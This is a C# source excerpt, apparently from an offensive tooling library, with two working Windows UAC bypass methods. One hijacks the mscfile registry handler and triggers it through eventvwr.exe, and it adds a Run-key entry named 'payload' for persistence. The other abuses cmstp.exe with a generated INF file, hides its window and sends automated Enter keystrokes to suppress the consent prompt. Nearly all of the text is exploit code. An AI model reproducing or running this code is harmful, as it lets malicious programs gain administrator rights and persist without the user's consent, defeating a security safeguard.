public static bool AutoElevate(string filename)
{
if (Win32.IsRunAsAdmin())
{
throw new AdminPrivilegesException("The application is already running as Administrator.");
}
if (!UAC.CanBypassUAC())
{
throw new InvalidUACConfigurationException("This method doesn't support the current configuration of the User Account Control (UAC).");
}
if (!File.Exists(filename))
{
throw new FileNotFoundException("The system cannot find the specified file.");
}
Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Classes\mscfile\shell\open\command").SetValue("", filename);
Microsoft.Win32.Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue("payload", filename);
System.Threading.Thread.Sleep(2000);
Process.Start("eventvwr.exe");
return(true);
}
/// <summary>
/// This method use CMSTP security vulnerability to make a privilege escalation without UAC prompting to the user for his consent.
/// This method works only if the user is a member of Administrators group. Otherwise, the privilege escalation fails and UAC prompt for administrator password.
/// CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets (SCT) and DLL. It is a trusted Microsoft binary which is located in the following two Windows directories.
/// </summary>
/// <returns>
/// Returns True if the privilege escalation has been successful.
/// </returns>
/// <exception cref="BinaryNotFoundException">Thrown if the CMSTP binary cannot be found in the System32 directory.</exception>
/// /// <exception cref="AdminPrivilegesException">Thrown if the application is already running as
/// Administrator.</exception>
/// <exception cref="InvalidUACConfigurationException">Thrown if the current configuration of the User Account Control (UAC)
/// is not supported by this method.</exception>
/// <exception cref="FileNotFoundException">Thrown if the specified file cannot be found.</exception>
public static bool AutoElevate(string CommandToExecute)
{
if (!File.Exists(BinaryPath))
{
throw new BinaryNotFoundException("Could not find cmstp.exe binary.");
}
if (Win32.IsRunAsAdmin())
{
throw new AdminPrivilegesException("The application is already running as Administrator.");
}
if (!UAC.CanBypassUAC())
{
throw new InvalidUACConfigurationException("This method doesn't support the current configuration of the User Account Control (UAC).");
}
if (!Win32.ExistsOnPath(CommandToExecute))
{
throw new FileNotFoundException("The system cannot find the specified file.");
}
//generate the .inf file.
StringBuilder InfFile = new StringBuilder();
InfFile.Append(SetInfFile(CommandToExecute));
//start the cmstp exploit.
ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
startInfo.Arguments = "/au " + InfFile.ToString();
startInfo.UseShellExecute = false;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(startInfo);
//automatically press enter when the cmstp prompting user confirmation.
IntPtr windowHandle = new IntPtr();
windowHandle = IntPtr.Zero;
do
{
windowHandle = SetWindowActive("cmstp");
} while (windowHandle == IntPtr.Zero && !WindowIsInForeground());
do
{
System.Windows.Forms.SendKeys.SendWait("{ENTER}");
}while (IsWindowVisible(windowHandle.ToInt32()));
//kill all cmstp proccesses, otherwise the next privilege escalation may fails.
foreach (Process p in Process.GetProcessesByName("cmstp"))
{
p.Kill();
}
return(true);
}
